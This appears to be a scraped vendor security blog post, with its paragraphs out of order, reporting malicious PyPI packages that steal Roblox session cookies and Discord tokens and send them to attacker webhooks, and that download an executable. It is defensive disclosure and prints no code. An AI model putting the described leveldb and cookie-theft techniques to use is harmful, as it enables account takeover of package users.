![]() Users of Nexus Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds. These versions, upon installation, simply downloaded and ran a suspicious EXE on the victim’s machine. Later versions of 'easyfuncsys,’ however left us surprised as these specifically targeted Windows users. It isn’t imminently clear what prompted the attacker to name the other two, ‘humanqueen’ and ‘humanqueenn.’ But, our review suggests that these two packages are used as a testing ground by the attacker whose main goal is to have users install ‘easyfuncsys.’įor ‘easyfuncsys’, the initial versions peek inside your web browsers’ local storage (‘leveldb’) files, a technique identical to what we have seen in previous attacks.įurther, Discord tokens from these files are retrieved and sent to the attacker’s webhook. ‘Easyfuncsys,’ with its vague description of “Sniping names” in particular appears to be a typosquat given that a similarly named legitimate package called easyfunctions exists. The second category of PyPI packages identified by us is Discord token stealers:Īll of the three packages contain identical code. This would bypass any two-step verification checks you’ve set up. The cookie should never be shared with anyone as attackers who can access your ‘ROBLOSECURITY’ cookie can potentially gain access to your account straight away. The ‘ROBLOSECURITY’ cookie is a sensitive piece of information stored by Roblox on the logged-in user’s web browser to track their sessions. My colleagues, Cody Nash who’s part of the development team behind the automated malware detection system, and security researcher Juan Aguirre, noticed “xss” versions 0.0.7 and 0.0.8 look for your ROBLOSECURITY cookie and send it to the attacker via a Discord webhook: For example, a simple XSS example would be you clicking on a link sent by the attacker, and this link opens a legitimate website, but sends your session cookies, for that website, to the attacker.Īlthough the ‘xss’ package may appear to be an ‘XSS toolkit’ that can be used by security professionals and pen-testers to create XSS exploits, the contents don’t quite convey that. Starting with the PyPI package ‘xss,’ for example, we see it touts itself to be a “simple XSS toolkit.”įor those unfamiliar with the term Cross-Site Scripting (XSS), its a form of attack exploited by the bad actor sending malicious code to the user’s web browser via a web application. However, the packages caught by us this time are of a quirky nature. ![]() Roblox Security Cookie StealerĪs gaming platforms like Discord and Roblox have gained popularity and rapid adoption, threat actors continue to target users and devs of these platforms through techniques like typosquatting or brandjacking, as Sonatype has previously reported. On discovering these packages this week, we rushed our findings to the PyPI security team who have since removed the packages. Steals Discord token and leveldb files, runs a suspicious EXEĪccording to PePy stats, these packages have been retrieved a total of 3,916 times-this includes downloads from PyPI users and automated mirrors. Possible typosquat of a legitimate package These packages shown below are accounted for in Sonatype’s security data under sonatype-2022-0706, and sonatype-2022-0723.ĭiscord token stealers, not a PoC for an “XSS” attack as the package claims This week, our early warning systems have once again caught malicious PyPI packages that steal your Roblox security cookies and Discord tokens. Among various examples, this has included Discord token and credit card stealers previously caught on the npm registry by our automated malware detection system, Nexus Firewall.Īnd, just last week, we reported that the PyPI repository had been flooded with more than 1200 dependency confusion packages that served no functional purpose. Over the past few years, Sonatype had consistently been on top of discovering malicious packages infiltrating open source ecosystems like npm, PyPI, and GitHub.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |